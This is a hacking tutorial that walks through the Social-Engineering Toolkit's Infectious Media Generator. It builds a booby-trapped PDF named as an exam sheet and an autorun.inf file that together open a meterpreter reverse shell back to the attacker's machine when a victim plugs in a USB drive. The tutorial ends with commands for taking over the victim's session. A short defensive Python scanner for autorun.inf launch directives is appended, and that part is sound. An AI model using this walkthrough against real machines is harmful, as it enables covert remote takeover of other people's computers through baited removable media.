Remote System Hacking using Autorun.inf file
In this attack we use the autorun.inf file to establish the connection without the victim clicking the file.
Requirements:
Attacker: BackTrack
Victim: Windows XP or Windows 7 with a PDF reader or comparably vulnerable software such as MS Office
Step 1: Go to the Social-Engineering Toolkit using
cd /pentest/exploits/set
./set
Step 2: Select Social-Engineering Attacks by choosing option 1.
Step 3: Select Infectious Media Generator by choosing option 3.
The Infectious Media Generator creates an autorun.inf file and a Metasploit payload. These files can be copied onto a USB drive, DVD or CD; when the victim opens the USB drive, the payload runs automatically.
Step 4: Select 1 for file-format exploits.
This shows the list of payloads; select one according to your requirements. Here I am using 11, Adobe PDF Embedded EXE Social Engineering.
Step 5: Select 1 to use your own PDF for the attack.
Now enter the path to the PDF file as /home/exam-sheet.pdf (the file name is exam-sheet.pdf).
Step 6: Select 2 for windows/meterpreter/reverse_tcp.
Step 7: Enter the IP address for the listener, which is the attacker machine's IP (my system's address is 192.168.56.101), and select port 80 as the port to connect to; the reverse connection comes in on this port.
Step 8: Now we need to edit the autorun.inf file. Go to the autorun directory, which holds both of our files: the payload file and the autorun file.
Follow these steps to edit and rename the files:
- Open a new terminal and type the following
- Go to the directory: cd /pentest/exploits/set/autorun
- Type nano autorun.inf. This opens the nano editor on the autorun.inf file; enter the name of the file you want opened when the USB drive is plugged in. Here I use the name exame-sheet.pdf.
- To change the name of the file, type mv template.pdf exame-sheet.pdf
- Copy both files onto the USB drive
When the USB drive is plugged into the victim system, the meterpreter session opens.
We can list the open sessions with the sessions -l command, and connect to a session by typing sessions -i 1
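From the defender's side, the autorun.inf edited in Step 8 is a plain-text file, so removable media can be checked for it before the drive reaches a Windows host. The following is an added example, not part of the original post or of SET: it reports the launch directives found in an autorun.inf. The function names and the sample file contents are constructed for illustration.

```python
import os
import re

# Keys in the [autorun] section that cause Windows to launch a file.
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$")

# Constructed sample, not the file SET generates.
SAMPLE = """; constructed sample
[AutoRun]
Open=exame-sheet.pdf
icon=autorun.ico
shell\\open\\command = "exame-sheet.pdf"
[other]
open=ignored.exe
"""

def launch_directives(text):
    """Return [(key, target)] for each launch directive in an autorun.inf body."""
    found, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()    # section names are case-insensitive
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip().strip('"')
        if value and (key in LAUNCH_KEYS or SHELL_CMD.match(key)):
            found.append((key, value))
    return found

def scan_drive(root):
    """Inspect the root of a mounted drive; the file name is matched case-insensitively."""
    for name in os.listdir(root):
        if name.lower() == "autorun.inf":
            with open(os.path.join(root, name), errors="replace") as fh:
                return launch_directives(fh.read())
    return []

if __name__ == "__main__":
    for key, target in launch_directives(SAMPLE):
        print(f"launch directive: {key} -> {target}")
```

Run scan_drive against the mount point of the drive on an analysis machine; a non-empty result names the files the media would try to launch where AutoRun is enabled.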